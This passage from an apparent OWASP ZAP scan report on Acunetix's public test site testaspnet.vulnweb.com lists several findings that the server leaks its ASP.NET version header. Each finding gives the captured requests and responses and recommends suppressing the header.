          __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTg2MjcwMzE2Mg9kFgICAQ9kFggCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WBB8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fucx8ABRJSZWFkTmV3cy5hc3B4P2lkPTBkAgcPFgIfAQVEU2VhbWxlc3MgT3BlblZBUyBpbnRlZ3JhdGlvbiBub3cgYWxzbyBhdmFpbGFibGUgb24gV2luZG93cyBhbmQgTGludXhkZD0ABLMUBs9bepCq8oSQPQHk%2FTUy&__VIEWSTATEGENERATOR=58A73C4D&__EVENTVALIDATION=%2FwEWWQKDytHbBQKAgcfvBQKFzrr8AQK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ9zWSYY5iwxqgBHXlBfPJ%2F1TT%2FYMA%3D%3D&tbComment=&btnSend=Send+comment
          Response
          Status line and header section (178 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Length: 0
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:19 GMT
          
          
          Response body (0 bytes)
          Evidence
          2.0.50727
          Solution

          Configure the server so it will not return those headers.

        19. POST http://testaspnet.vulnweb.com/Comments.aspx?id=2
          Alert tags
          Alert description

          Server leaks information via "X-AspNet-Version"/"X-AspNetMvc-Version" HTTP response header field(s).

          Other info

          An attacker can use this information to exploit known vulnerabilities.

          Request
          Request line and header section (413 bytes)
          POST http://testaspnet.vulnweb.com/Comments.aspx?id=2 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=2
          Content-Length: 1721
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (1721 bytes)
          __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTg2MjcwMzE2Mg9kFgICAQ9kFggCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WBB8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT8fAAUSUmVhZE5ld3MuYXNweD9pZD0yZAIHDxYCHwEFrAIyMSBKdWx5IDIwMDUgLSBTdGFydC11cCBjb21wYW55IEFjdW5ldGl4IHJlbGVhc2VkIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXI6IGEgdG9vbCB0byBhdXRvbWF0aWNhbGx5IGF1ZGl0IHdlYnNpdGUgc2VjdXJpdHkuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgMiBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUsIGxhdW5jaGVzIHBvcHVsYXIgd2ViIGF0dGFja3MgKFNRTCBJbmplY3Rpb24gZXRjLikgYW5kIGlkZW50aWZpZXMgdnVsbmVyYWJpbGl0aWVzIHRoYXQgbmVlZCB0byBiZSBmaXhlZC5kZLQBJ3hOt3r5jKtYjVFFKdowCSWC&__VIEWSTATEGENERATOR=58A73C4D&__EVENTVALIDATION=%2FwEWWQKpxZClDQKAgcfvBQKFzrr8AQK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ%2Fpbihq93nLJJrCcGURk6iWNCIK%2BA%3D%3D&tbComment=&btnSend=Send+comment
          Response
          Status line and header section (178 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Length: 0
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:20 GMT
          
          
          Response body (0 bytes)
          Evidence
          2.0.50727
          Solution

          Configure the server so it will not return those headers.

        20. POST http://testaspnet.vulnweb.com/Comments.aspx?id=3
          Alert tags
          Alert description

          Server leaks information via "X-AspNet-Version"/"X-AspNetMvc-Version" HTTP response header field(s).

          Other info

          An attacker can use this information to exploit known vulnerabilities.

          Request
          Request line and header section (413 bytes)
          POST http://testaspnet.vulnweb.com/Comments.aspx?id=3 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=3
          Content-Length: 1539
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (1539 bytes)
          __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTg2MjcwMzE2Mg9kFgICAQ9kFggCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WBB8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhHwAFElJlYWROZXdzLmFzcHg%2FaWQ9M2QCBw8WAh8BBagBMjYgSmFudWFyeSAyMDA1IC0gQSBiZXRhIHZlcnNpb24gb2YgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciBoYXMgYmVlbiByZWxlYXNlZCB0b2RheS4gVGhlIGJldGEgaXMgYXZhaWxhYmxlIGZvciBkb3dubG9hZCBhdCBodHRwOi8vd3d3LmFjdW5ldGl4LmNvbS9kb3dubG9hZC8uZGQzP%2FMHHnstJY%2FfWtD4cYSdoYkheQ%3D%3D&__VIEWSTATEGENERATOR=58A73C4D&__EVENTVALIDATION=%2FwEWWQLj8dP9DwKAgcfvBQKFzrr8AQK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ9dpx0P1QE7KvkQnKR4Ij212SQ8lw%3D%3D&tbComment=&btnSend=Send+comment
          Response
          Status line and header section (178 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Length: 0
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:20 GMT
          
          
          Response body (0 bytes)
          Evidence
          2.0.50727
          Solution

          Configure the server so it will not return those headers.

        21. POST http://testaspnet.vulnweb.com/default.aspx
          Alert tags
          Alert description

          Server leaks information via "X-AspNet-Version"/"X-AspNetMvc-Version" HTTP response header field(s).

          Other info

          An attacker can use this information to exploit known vulnerabilities.

          Request
          Request line and header section (388 bytes)
          POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com
          Content-Length: 1025
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (1025 bytes)
          __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8%2F4bzlRmUHIna4LG5&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLpus%2FwCAK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ8DK3Y7%2FBz6vaeG4S8AOaGVC7NUiA%3D%3D
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:19 GMT
          Content-Length: 12371
          
          
          Response body (12371 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>acublog news</title>
          		<META http-equiv="Content-Type" content="text/html; charset=windows-1252">
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="default.aspx" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q8DK3Y7/Bz6vaeG4S8AOaGVC7NUiA==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD id="tdPageData" valign="top">
          					</TD>
          
          					<TD vAlign="top" width="200">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          </TD>
          				</TR>
          				<TR>
          					<TD colSpan="2">
          					</TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          2.0.50727
          Solution

          Configure the server so it will not return those headers.

        22. POST http://testaspnet.vulnweb.com/login.aspx
          Alert tags
          Alert description

          Server leaks information via "X-AspNet-Version"/"X-AspNetMvc-Version" HTTP response header field(s).

          Other info

          An attacker can use this information to exploit known vulnerabilities.

          Request
          Request line and header section (397 bytes)
          POST http://testaspnet.vulnweb.com/login.aspx HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com/login.aspx
          Content-Length: 1197
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (1197 bytes)
          __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTIyMzk2OTgxMQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQ9jYlBlcnNpc3RDb29raWVzwbv%2BQ8XadeewSqHhJbH9z4dvJw%3D%3D&__VIEWSTATEGENERATOR=C2EE9ABB&__EVENTVALIDATION=%2FwEWWwLoz%2FfGCgLStq24BwK3jsrkBALtuvfLDQKC3IeGDAK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ8xY%2BHkfERpF5ijDSZsRL1CxlmHEA%3D%3D&tbUsername=ZAP&tbPassword=ZAP&cbPersistCookie=on&btnLogin=Login
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:19 GMT
          Content-Length: 13281
          
          
          Response body (13281 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>login</title>
          		<meta name="vs_showGrid" content="True">
